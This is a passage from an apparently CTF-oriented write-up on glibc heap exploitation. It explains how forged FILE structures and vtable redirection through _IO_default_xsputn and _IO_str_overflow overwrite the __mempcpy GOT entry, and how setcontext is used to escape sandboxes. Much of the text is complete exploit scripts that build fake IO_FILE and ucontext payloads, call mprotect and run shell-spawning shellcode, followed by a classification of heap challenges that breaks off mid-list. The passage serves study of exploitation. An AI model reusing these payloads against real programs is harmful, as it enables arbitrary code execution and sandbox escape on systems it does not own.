  • s->_wide_data->_IO_write_base is controllable
  • int used = s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base is controllable

so the requirement of three controllable arguments is met. Then, by making the vtable of ((struct helper_file*) s)->_put_stream point at _IO_str_jumps, we get it to call _IO_default_xsputn.

Note that s->_wide_data->_IO_write_ptr and s->_wide_data->_IO_write_base are of type wchar_t *, which means used is really (s->_wide_data->_IO_write_ptr - s->_wide_data->_IO_write_base) >> 2 in terms of byte addresses. (On Linux, wide characters are normally encoded as UTF-32, which uses 32 bits per character, so wchar_t is normally 4 bytes on Linux.)
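The divide-by-four is easy to get wrong when forging the wide data, so here is a small sketch of the arithmetic. `wide_used` and `wide_write_ptr_for` are illustrative helper names, and the 4-byte wchar_t is the Linux assumption stated above.

```python
WCHAR_SIZE = 4  # sizeof(wchar_t) on Linux, as noted above


def wide_used(write_base, write_ptr):
    """Value of `used` as C computes it for two wchar_t * pointers (write_ptr >= write_base)."""
    return (write_ptr - write_base) // WCHAR_SIZE


def wide_write_ptr_for(write_base, n):
    """_IO_write_ptr to forge so that `used`, the n passed to _IO_sputn, equals n."""
    return write_base + n * WCHAR_SIZE


base = 0x1000  # made-up address of the data to copy
ptr = wide_write_ptr_for(base, 0x30)
print(hex(ptr), hex(wide_used(base, ptr)))
```

In other words, to pass a length of n bytes to _IO_default_xsputn, the forged _IO_write_ptr has to be 4 * n bytes past _IO_write_base.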

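_IO_default_xsputn has quite a lot to get past. Its role in the attack is to call __mempcpy twice: the first call uses the arbitrary write to change the value in the GOT entry of __mempcpy, and the second call to __mempcpy hijacks the control flow.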

size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
// need more > count so that we come back and execute __mempcpy again
if (count > more)
count = more;
// need count > 20
if (count > 20)
{
// Use this spot for house of 借刀杀人:
// overwrite the memcpy entry with setcontext,
// so that the next pass through here achieves house of 一骑当千
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
// need more > count so that we come back and execute __mempcpy again
more -= count;
}
// get past the following line so that the for loop body runs again
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)

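What has to be bypassed, in summary:

  • more > count is required so that control comes back to __mempcpy a second time. By then f->_IO_write_ptr has been changed by _IO_str_overflow to point at the "/bin/sh" string, so count = f->_IO_write_end - f->_IO_write_ptr may be very large; that makes count > more, and count is clamped to more. The second pass therefore requires more > 20. Since the previous pass executed more -= count and then more--, this means more ≥ count + 1 + 21.
  • count > 20 is required, so count is at least 21.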
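The bound more ≥ count + 1 + 21 can be checked with a tiny model of the loop counters. This sketch only tracks `more` and `count` for the first two iterations and assumes _IO_OVERFLOW does not return EOF; `mempcpy_counts` is an illustrative name, and the "room" arguments stand for f->_IO_write_end - f->_IO_write_ptr at the start of each pass.

```python
def mempcpy_counts(n, first_room, second_room):
    """Counts passed to __mempcpy in the first two passes of _IO_default_xsputn."""
    more = n
    calls = []
    for room in (first_room, second_room):
        count = min(room, more)   # clamp: if (count > more) count = more
        if count > 20:            # only this branch uses __mempcpy
            calls.append(count)
        more -= count
        if more == 0:
            break
        more -= 1                 # one byte is consumed by _IO_OVERFLOW
    return calls


HUGE = 1 << 62  # write_end far above the new write_ptr after _IO_str_overflow

print(mempcpy_counts(21 + 1 + 21, 21, HUGE))  # two __mempcpy calls
print(mempcpy_counts(21 + 1 + 20, 21, HUGE))  # second pass falls below the threshold
```

With a first count of 21, n = 43 is the smallest length that reaches __mempcpy twice; one byte fewer and the second pass takes the byte-by-byte copy instead.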

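First execution of __mempcpy (f->_IO_write_ptr, s, count):

  • _IO_write_ptr is the GOT entry of __mempcpy
  • s is the content to write

Second execution of __mempcpy (f->_IO_write_ptr, s, count):

  • if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF) has to be bypassed; how to do that is described next
  • f->_IO_write_ptr is rdi, s is rsi, and count is rdx

Likewise, _IO_str_overflow has quite a few checks to get past. Its job here is to control fp->_IO_write_ptr, and through it the first argument of __mempcpy in the second loop iteration of _IO_default_xsputn.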

int _IO_str_overflow (FILE *fp, int c)
{
int flush_only = c == EOF;
size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
// must enter this branch to control fp->_IO_write_ptr: _flags==0x400
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr; // point fp->_IO_write_ptr at &"/bin/sh" - 1; it becomes the first argument of the next memcpy (system by then)
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
// must not enter: make _IO_blen (fp), i.e. ((fp)->_IO_buf_end - (fp)->_IO_buf_base), large enough
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf = malloc (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
free (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);

_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}

if (!flush_only)
// fp->_IO_write_ptr is incremented by 1 here, which is why it was set 1 lower earlier
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)

What has to be bypassed, in summary:

  • _flags = 0x400
  • fp->_IO_read_ptr is the rdi of the second __mempcpy (f->_IO_write_ptr, s, count) minus 1
  • (fp)->_IO_buf_end - (fp)->_IO_buf_base must be large enough; setting (fp)->_IO_buf_end = 0xFFFFFFFFFFFFFFF0 usually suffices

[[./houseofkmwl1.png]]

house of 一骑当千

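house of 一骑当千 is an attack technique that can always bypass the sandbox using nothing but setcontext.

The ucontext function family

int getcontext(ucontext_t *ucp);
int setcontext(const ucontext_t *ucp);
void makecontext(ucontext_t *ucp, void (*func)(), int argc, ...);
int swapcontext(ucontext_t *restrict oucp,const ucontext_t *restrict ucp);
  1. getcontext retrieves the current user context
  2. setcontext installs a user context
  3. makecontext manipulates a user context and can set the function to execute; under the hood it relies on setcontext
  4. swapcontext swaps two contexts
setcontext

Take setcontext, the one we care about, as the example. It is written in assembly, in /sysdeps/unix/sysv/linux/x86_64/setcontext.S. Once the complicated macros are stripped away, apart from the signal-mask system call (__NR_rt_sigprocmask) it is nothing more than a series of assignments. (The code is long, but to show the whole picture I have not trimmed it; focus on the annotated places.)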

ENTRY(__setcontext)
/* Save argument since syscall will destroy it. */
pushq %rdi
cfi_adjust_cfa_offset(8)

/* Set the signal mask with
rt_sigprocmask (SIG_SETMASK, mask, NULL, _NSIG/8). */
leaq oSIGMASK(%rdi), %rsi
xorl %edx, %edx
movl $SIG_SETMASK, %edi
movl $_NSIG8,%r10d
movl $__NR_rt_sigprocmask, %eax
syscall
/* Pop the pointer into RDX. The choice is arbitrary, but
leaving RDI and RSI available for use later can avoid
shuffling values. */
popq %rdx # this is the key step that moves rdi into rdx
cfi_adjust_cfa_offset(-8)
cmpq $-4095, %rax /* Check %rax for error. */
jae SYSCALL_ERROR_LABEL /* Jump to error handler if error. */

/* Restore the floating-point context. Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
ldmxcsr oMXCSR(%rdx)


/* Load the new stack pointer, the preserved registers and
registers used for passing args. */
cfi_def_cfa(%rdx, 0)
cfi_offset(%rbx,oRBX)
cfi_offset(%rbp,oRBP)
cfi_offset(%r12,oR12)
cfi_offset(%r13,oR13)
cfi_offset(%r14,oR14)
cfi_offset(%r15,oR15)
cfi_offset(%rsp,oRSP)
cfi_offset(%rip,oRIP)
/* from here on is setcontext+61 */
movq oRSP(%rdx), %rsp
movq oRBX(%rdx), %rbx
movq oRBP(%rdx), %rbp
movq oR12(%rdx), %r12
movq oR13(%rdx), %r13
movq oR14(%rdx), %r14
movq oR15(%rdx), %r15

#if SHSTK_ENABLED
/* Check if shadow stack is enabled. */
testl $X86_FEATURE_1_SHSTK, %fs:FEATURE_1_OFFSET
jz L(no_shstk)

/* If the base of the target shadow stack is the same as the
base of the current shadow stack, we unwind the shadow
stack. Otherwise it is a stack switch and we look for a
restore token. */
movq oSSP(%rdx), %rsi
movq %rsi, %rdi

/* Get the base of the target shadow stack. */
movq (oSSP + 8)(%rdx), %rcx
cmpq %fs:SSP_BASE_OFFSET, %rcx
je L(unwind_shadow_stack)

L(find_restore_token_loop):
/* Look for a restore token. */
movq -8(%rsi), %rax
andq $-8, %rax
cmpq %rsi, %rax
je L(restore_shadow_stack)

/* Try the next slot. */
subq $8, %rsi
jmp L(find_restore_token_loop)

L(restore_shadow_stack):
/* Pop return address from the shadow stack since setcontext
will not return. */
movq $1, %rax
incsspq %rax

/* Use the restore stoken to restore the target shadow stack. */
rstorssp -8(%rsi)

/* Save the restore token on the old shadow stack. NB: This
restore token may be checked by setcontext or swapcontext
later. */
saveprevssp

/* Record the new shadow stack base that was switched to. */
movq (oSSP + 8)(%rdx), %rax
movq %rax, %fs:SSP_BASE_OFFSET

L(unwind_shadow_stack):
rdsspq %rcx
subq %rdi, %rcx
je L(skip_unwind_shadow_stack)
negq %rcx
shrq $3, %rcx
movl $255, %esi
L(loop):
cmpq %rsi, %rcx
cmovb %rcx, %rsi
incsspq %rsi
subq %rsi, %rcx
ja L(loop)

L(skip_unwind_shadow_stack):
movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Get the return address set with getcontext. */
movq oRIP(%rdx), %r10

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* Check if return address is valid for the case when setcontext
is invoked from __start_context with linked context. */
rdsspq %rax
cmpq (%rax), %r10
/* Clear RAX to indicate success. NB: Don't use xorl to keep
EFLAGS for jne. */
movl $0, %eax
jne L(jmp)
/* Return to the new context if return address valid. */
pushq %r10
ret

L(jmp):
/* Jump to the new context directly. */
jmp *%r10

L(no_shstk):
#endif
/* The following ret should return to the address set with
getcontext. Therefore push the address on the stack. */
movq oRIP(%rdx), %rcx
pushq %rcx

movq oRSI(%rdx), %rsi
movq oRDI(%rdx), %rdi
movq oRCX(%rdx), %rcx
movq oR8(%rdx), %r8
movq oR9(%rdx), %r9

/* Setup finally %rdx. */
movq oRDX(%rdx), %rdx

/* End FDE here, we fall into another context. */
cfi_endproc
cfi_startproc

/* Clear rax to indicate success. */
xorl %eax, %eax
ret
PSEUDO_END(__setcontext)

weak_alias (__setcontext, setcontext)

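The ucontext struct

The ucontext function family takes a struct of type ucontext, which is what is passed to setcontext in rdi. The struct looks like this.

typedef struct ucontext_t
{
unsigned long int __ctx(uc_flags); // 1 word
struct ucontext_t *uc_link; // 1 word
stack_t uc_stack; // 3 words
mcontext_t uc_mcontext; // part used 1
sigset_t uc_sigmask; // part used 2
struct _libc_fpstate __fpregs_mem; // part used 3
__extension__ unsigned long long int __ssp[4]; // part used 4
} ucontext_t;

setcontext only operates on these four members: mcontext_t uc_mcontext, sigset_t uc_sigmask, struct _libc_fpstate __fpregs_mem and __ssp. It does not touch the rest, so we do not need to care about the other values.

  1. uc_sigmask: this is the signal mask. Testing shows all zeros is fine; a signal mask copied from another program also works.

  2. uc_mcontext: this is the struct that stores the registers, and it is the area we normally use with setcontext+53. The struct is as follows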

typedef struct
{
gregset_t __ctx(gregs);
/* Note that fpregs is a pointer. */
fpregset_t __ctx(fpregs);
__extension__ unsigned long long __reserved1 [8];
} mcontext_t;
typedef greg_t gregset_t[__NGREG];

#ifdef __USE_GNU
/* Number of each register in the `gregset_t' array. */
enum
{
REG_R8 = 0,
# define REG_R8 REG_R8
REG_R9,
# define REG_R9 REG_R9
REG_R10,
# define REG_R10 REG_R10
REG_R11,
# define REG_R11 REG_R11
REG_R12,
# define REG_R12 REG_R12
REG_R13,
# define REG_R13 REG_R13
REG_R14,
# define REG_R14 REG_R14
REG_R15,
# define REG_R15 REG_R15
REG_RDI,
# define REG_RDI REG_RDI
REG_RSI,
# define REG_RSI REG_RSI
REG_RBP,
# define REG_RBP REG_RBP
REG_RBX,
# define REG_RBX REG_RBX
REG_RDX,
# define REG_RDX REG_RDX
REG_RAX,
# define REG_RAX REG_RAX
REG_RCX,
# define REG_RCX REG_RCX
REG_RSP,
# define REG_RSP REG_RSP
REG_RIP,
# define REG_RIP REG_RIP
REG_EFL,
# define REG_EFL REG_EFL
REG_CSGSFS, /* Actually short cs, gs, fs, __pad0. */
# define REG_CSGSFS REG_CSGSFS
REG_ERR,
# define REG_ERR REG_ERR
REG_TRAPNO,
# define REG_TRAPNO REG_TRAPNO
REG_OLDMASK,
# define REG_OLDMASK REG_OLDMASK
REG_CR2
# define REG_CR2 REG_CR2
};
#endif
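  3. __fpregs_mem: this corresponds to the following part of setcontext, which loads the floating-point environment; the address needs to be writable. The offset is 0xe0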
/* Restore the floating-point context.  Not the registers, only the
rest. */
movq oFPREGS(%rdx), %rcx
fldenv (%rcx)
  4. __ssp: this corresponds to the following part of setcontext, which loads the MXCSR register; testing shows 0 also works. The offset is 0x1c0
ldmxcsr oMXCSR(%rdx)
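The register offsets inside the fake ucontext follow directly from the gregset_t enum above, so they can be computed instead of counted by hand. The sketch below uses only the standard library; `GREG_NAMES`, `greg_offset` and `build_ucontext` are illustrative names, and the 0x28 base assumes the x86-64 sizes given in the struct comments (uc_flags and uc_link one word each, uc_stack three words).

```python
import struct

# Register order taken from the gregset_t enum shown above (REG_R8 = 0 ...).
GREG_NAMES = [
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
]
GREGS_BASE = 0x28  # uc_flags (8) + uc_link (8) + uc_stack (24)
O_FPREGS = 0xe0    # offset of the fpregs pointer, as stated in the text


def greg_offset(name):
    """Offset of a saved register inside ucontext_t."""
    return GREGS_BASE + 8 * GREG_NAMES.index(name)


def build_ucontext(regs, fpregs_ptr):
    """Build the first 0xe8 bytes of a fake ucontext_t; unset fields stay zero."""
    buf = bytearray(O_FPREGS + 8)
    for name, value in regs.items():
        struct.pack_into("<Q", buf, greg_offset(name), value)
    struct.pack_into("<Q", buf, O_FPREGS, fpregs_ptr)
    return bytes(buf)


# Made-up values, only to show the layout.
ctx = build_ucontext({"rdi": 0x1000, "rsi": 0x20000, "rdx": 7,
                      "rsp": 0x2000, "rip": 0x401000}, fpregs_ptr=0x3000)
print(hex(greg_offset("rdi")), hex(greg_offset("rsp")), hex(greg_offset("rip")), hex(len(ctx)))
```

Writing registers by name avoids ordering mistakes between neighbouring slots such as rax and rcx, which are easy to swap when the values are appended one p64 at a time.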

exp

ucontext =b''
ucontext += p64(0)*5
mprotect_len = 0x20000
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0

# When padding below is empty, fake_io_addr is the address where ucontext starts
padding = fake_io_file
payload_start_addr = fake_io_addr
# 0x2e8 is the value printed below by print("IO_FILE len is",hex(len(payload)))
# add 0x10 for a largebin attack
__rsp = payload_start_addr + 0x2e8 + 0x10
__rip = mprotect_addr
ucontext += p64(0)*8
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rax) # gregs order is ..., RDX, RAX, RCX, RSP, RIP
ucontext += p64(__rcx)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
ucontext += p64(heap_addr+0x6000) # fldenv [rcx] loads the floating-point environment; must point to valid memory (a writable heap address is used here)
print("ucontext len is:",hex(len(ucontext))) # 0xe8

'''
ucontext = ucontext.ljust(0x128,b'\x00')

# Load the signal mask; all zeros seems to work as well. 0x10 qwords
ucontext += p64(0)*0x10
# ucontext += p64(0)+p64(0x0000002000000000)+p64(0)+p64(0)+p64(0x0000034000000340)+p64(0x0000000000000001)+p64(0x0000000103ae75f6)+p64(0)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0x0000034000000340)+p64(0)

ucontext =ucontext.ljust(0x1c0,b'\x00')

# ucontext += p64(0x1f80) # LDMXCSR [rdx+0x1c0] loads the MXCSR register; 0 seems to work as well
'''

# The payload can start at fake_io_file, or directly at ucontext
payload = padding + ucontext

# 0x2e8 here matches the constant used for __rsp
print("IO_FILE len is",hex(len(payload)))
# Write your own shellcode here
shellcode = """

"""

# Add 0x10 when the payload is delivered via a largebin attack
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10)

payload += bytes(asm(shellcode))
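
The hand-built ucontext above can be wrapped in a small helper so the register slots are filled by name instead of by counting p64 calls. This is a sketch under stated assumptions: build_ucontext is a hypothetical helper, p64 is reimplemented with struct so the block runs without pwntools, and the addresses in the usage part are placeholders. The register order follows the gregset_t enum (RDX, RAX, RCX, RSP, RIP).

```python
import struct


def p64(value):
    """Pack an unsigned 64-bit little-endian integer (same role as pwntools' p64)."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def build_ucontext(rdi, rsi, rdx, rsp, rip, fpregs_ptr, rbp=0, rbx=0, rax=0, rcx=0):
    """Return the first 0xe8 bytes of a fake ucontext_t for setcontext."""
    buf = p64(0) * 5                     # uc_flags, uc_link, uc_stack (0x28 bytes)
    buf += p64(0) * 8                    # r8 .. r15, unused here
    for reg in (rdi, rsi, rbp, rbx, rdx, rax, rcx, rsp, rip):
        buf += p64(reg)                  # slots 0x68 .. 0xa8
    buf = buf.ljust(0xe0, b"\x00")
    buf += p64(fpregs_ptr)               # pointer consumed by fldenv
    return buf


# Usage with placeholder addresses (hypothetical values, not from a real target)
heap_addr = 0x555555559000
mprotect_addr = 0x7ffff7e11c50
fake_io_addr = heap_addr + 0x1390
ucontext = build_ucontext(
    rdi=heap_addr, rsi=0x20000, rdx=7,   # mprotect(heap_addr, 0x20000, RWX)
    rsp=fake_io_addr + 0x2e8 + 0x10,
    rip=mprotect_addr,
    fpregs_ptr=heap_addr + 0x6000,
    rbp=heap_addr + 0x20000,
)
print("ucontext len is:", hex(len(ucontext)))
```

Keeping the layout in one function means a change of target (for example execve instead of mprotect) only touches the call site.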

Complete versions

house of 琴瑟琵琶

exp
fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(setcontext_addr) # function to call
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # rdi passed to that function
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # triggers _IO_obstack_xsputn;
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # delivered via a largebin attack, so: 0xd8=0xe8-0x10
# pause()

# Contents stored at the address that is passed in rdi
ucontext = b''
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# heap_addr + tcache_thead_size + 0x10000 # for system, the stack frame must be long enough
# 0x1c0 is the length printed by print("payload len is",hex(len(payload))) below
# Add 0x10 when the payload is delivered via a largebin attack
__rsp = fake_io_addr + 0x1c0 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rax) # gregs order is ..., RDX, RAX, RCX, RSP, RIP
ucontext += p64(__rcx)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
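ucontext += p64(heap_addr+0x6000) # fldenv [rcx] loads the floating-point environment; must point to valid memory (a writable heap address is used here)

payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x1c0, matching the constant used for __rsp
# pause()
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # add 0x10 when delivered via a largebin attack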
payload = payload + bytes(shellcode)
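
The ljust/+= chain that builds fake_io_file above can also be written as an offset-to-value table, which makes the field positions explicit. This is a minimal sketch: place is a hypothetical helper (pwntools' flat() supports a similar dictionary form), all addresses are placeholders, and the offsets are the same data-relative offsets used in the exp, i.e. they exclude the 0x10-byte chunk header.

```python
import struct


def place(fields, length):
    """Build a zero-filled buffer of `length` bytes with 8-byte values at the given offsets."""
    buf = bytearray(length)
    for offset, value in fields.items():
        struct.pack_into("<Q", buf, offset, value)
    return bytes(buf)


# Placeholder addresses for illustration only
heap_addr = 0x555555559000
setcontext_addr = 0x7ffff7e45a30
IO_obstack_jumps_addr = 0x7ffff7fa83c0

fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30

fake_io_file = place({
    0x58: setcontext_addr,               # function to call
    0x68: fake_io_addr + 0xe8,           # rdi passed to that function
    0x70: 1,                             # obstack->use_extra_arg = 1
    0x78: heap_addr + 0x2000,            # _lock
    0xc8: IO_obstack_jumps_addr + 0x20,  # vtable slot, as in the exp above
    0xd0: obstack_ptr,                   # struct obstack *obstack
}, 0xd8)
print(hex(len(fake_io_file)))
```

The table form is convenient when the same fake structure has to be re-based for a different glibc, since only the values change while the offsets stay in one place.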

house of 魑魅魍魉

exp
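# house of 魑魅魍魉 delivered via a largebin attack
# Simulates having only a single write, so the payload must be written beforehand
# To make sure it executes correctly, the COMPILE_WPRINTF==1 mode has to be used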

fake_io_addr = heap_addr + 0x1390
put_stream_offset = 0x30 # offset of put_stream from fake_io
put_stream_addr = fake_io_addr + put_stream_offset
write_target_addr = memcpy_addr
target_value_offset = 0x200 # offset from fake_io of the slot holding the function to call
target_value_addr = fake_io_addr + target_value_offset


IO_wide_data_addr = fake_io_addr + 0xe0 # len(IO_FILE); reuses the existing wide-character data
# Address held in rdi when memcpy is reached the second time
rdi_offset = 0xf # _IO_write_ptr gets incremented by 1, so this keeps the final address aligned
rdi_ucontext_addr = target_value_addr + rdi_offset
# more_len > count_len > 0x20 lets memcpy run a second time
more_len = 0x80*8 # why does IO_help_jump_0_ additionally shift right by 2 bits here??
count_len= 0x28 # must be greater than 0x20
_flags = 0x400 # _flags == 0x400 makes fp->_IO_write_ptr = fp->_IO_read_ptr execute


fake_io_file = b""
fake_io_file = fake_io_file.ljust(0x20,b'\x00')
fake_io_file += p64(_flags) # start of put_stream; _flags == 0x400 makes fp->_IO_write_ptr = fp->_IO_read_ptr execute
fake_io_file += p64(rdi_ucontext_addr)
fake_io_file += p64(0)*2
fake_io_file += p64(write_target_addr - 0x20)
fake_io_file += p64(write_target_addr)
fake_io_file += p64(write_target_addr + count_len)
fake_io_file += p64(0)
# Bypasses if (pos >= (size_t) (_IO_blen (fp) + flush_only)) so that malloc is not called
fake_io_file += p64((1<<64)-1)
fake_io_file += p64(0)*2
fake_io_file += p64(heap_addr+0x2000) # writable
fake_io_file += p64(0)*2
fake_io_file += p64(IO_wide_data_addr)
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_help_jump_0_addr)
fake_io_file += p64(0)
fake_io_file += p64(heap_addr+0x2000) # writable
fake_io_file += p64(0)
fake_io_file += p64(target_value_addr)
fake_io_file += p64(target_value_addr + more_len)
fake_io_file += p64(IO_str_jumps_addr)
fake_io_file = fake_io_file.ljust(0x1b8,b'\x00')
fake_io_file += p64(put_stream_addr)
fake_io_file = fake_io_file.ljust(target_value_offset - 0x10,b"\x00") # subtract 0x10 when delivered via a largebin attack

# The function to call is setcontext, stored at offset target_value_offset from fake_io
fake_io_file += p64(setcontext_addr) + p64(0) # this piece is 0x10 bytes long, matching rdi_offset


ucontext = b""
ucontext += p64(0)*13
mprotect_len = 0x20000
tcache_thead_size = 0x290
__rdi = heap_addr # heap_addr binsh_addr
__rsi = mprotect_len
__rbp = heap_addr + mprotect_len
__rbx = 0
__rdx = 7
__rcx = 0
__rax = 0
# heap_addr + tcache_thead_size + 0x10000 # for system, the stack frame must be long enough
# 0x2e8 is the length printed by print("payload len is",hex(len(payload))) below
# Add 0x10 when the payload is delivered via a largebin attack
__rsp = fake_io_addr + 0x2e8 + 0x10
__rip = mprotect_addr #execve_addr #mprotect_addr
ucontext += p64(__rdi)
ucontext += p64(__rsi)
ucontext += p64(__rbp)
ucontext += p64(__rbx)
ucontext += p64(__rdx)
ucontext += p64(__rax) # gregs order is ..., RDX, RAX, RCX, RSP, RIP
ucontext += p64(__rcx)
ucontext += p64(__rsp)
ucontext += p64(__rip)
ucontext = ucontext.ljust(0xe0,b'\x00')
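ucontext += p64(heap_addr+0x6000) # fldenv [rcx] loads the floating-point environment; must point to valid memory (a writable heap address is used here)


payload = fake_io_file + ucontext
print("payload len is",hex(len(payload))) # 0x2e8, matching the constant used for __rsp
shellcode = asm(shellcraft.sh())
payload += p64(fake_io_addr + len(payload) + 0x8 + 0x10) # add 0x10 when delivered via a largebin attack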
payload += bytes(shellcode)
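
The magic constants in the two complete exps (0xe8, 0x1c0, 0x2e8, the repeated "+ 0x10") all come from the same arithmetic, so they can be derived rather than read off a print. A minimal sketch, assuming the written data starts 0x10 bytes after fake_io_addr (the chunk header in the largebin case); payload_layout is a hypothetical helper name.

```python
HEADER = 0x10  # chunk header preceding the written data in the largebin case


def payload_layout(fake_io_len, ucontext_len=0xe8, header=HEADER):
    """Offsets, relative to fake_io_addr, of the pieces that follow the fake FILE."""
    ucontext_off = header + fake_io_len          # where setcontext's argument lives
    ret_slot_off = ucontext_off + ucontext_len   # value to load into rsp
    shellcode_off = ret_slot_off + 8             # value stored in the return slot
    return {"ucontext": ucontext_off, "rsp": ret_slot_off, "shellcode": shellcode_off}


# house of 琴瑟琵琶: fake_io_file is 0xd8 bytes
qsp = payload_layout(0xd8)
# house of 魑魅魍魉: fake_io_file is padded to target_value_offset = 0x200 bytes
cmw = payload_layout(0x200)

for name, layout in (("琴瑟琵琶", qsp), ("魑魅魍魉", cmw)):
    print(name, {k: hex(v) for k, v in layout.items()})
```

For 琴瑟琵琶 this reproduces rdi = fake_io_addr + 0xe8 and __rsp = fake_io_addr + 0x1c0 + 0x10; for 魑魅魍魉 the ucontext offset 0x210 equals target_value_offset + rdi_offset + 1, which is why rdi_offset is 0xf.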

Summary

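Heap challenges can be classified along three axes:

1. The number of memory writes: some challenges allow multiple (two or more) writes, others only one.
2. The kind of write: some allow arbitrary writes, i.e. a chunk can be allocated at the target memory; others cannot write arbitrary data and can only write a heap value or an unsorted bin address, as in a largebin attack.
3. Leaks: apart from a few methods, most attacks need a memory leak. Some challenges also allow leaking data from memory a second time, for example ptr_guard; I call this a "second leak". With few exceptions, a second leak requires allocating a chunk at the location to be leaked, so without an arbitrary write a second leak is clearly not achievable (silly challenges that simply plant a flag aside).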

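1. Memory write: any address, any number of times, any data; second leak possible

This is the easiest kind. Before 2.34, attack the hooks; from 2.34 on, either EOP or wide_IO works. If IO functions are available, house of 秦月汉关 is also an option. These attacks are mostly tcache-based.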

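2. Memory write: any address, any number of times, any data; no second leak

Essentially the same as the previous case; without a second leak, we simply overwrite the target directly.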

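3. Memory write: any address, once, any data; second leak possible

Before 2.34, attack the hooks; from 2.34 on, either EOP or wide_IO works. EOP remains usable because a second leak is available.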

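4. Memory write: any address, once, any data; no second leak

Before 2.34, attack the hooks; from 2.34 on, vtable, EOP, or wide_IO all work.

Note: this is the turning point. In general, if memory can be overwritten arbitrarily, a chunk can be allocated at that memory. In that case overwriting a hook is very intuitive and simple, and even though hooks are gone from 2.34 on, the attack can still be carried out by modifying the vtable, EOP, and similar means. If memory cannot be overwritten arbitrarily, the only way to attack is through IO.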

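5. Memory write: any address, any number of times, heap value only; second leak possible (not feasible)

If memory cannot be overwritten arbitrarily, a chunk cannot be allocated at the target memory, so a second leak is essentially out of reach.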

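6. Memory write: any address, any number of times, heap value only; no second leak

Being able to write heap values multiple times leaves many options: house_of_emma is one, and the wide-character template works as well.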

7. Memory write: any address, once, heap value only; second leak possible (not feasible)

Same as case 5.

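8. Memory write: any address, once, heap value only; no second leak

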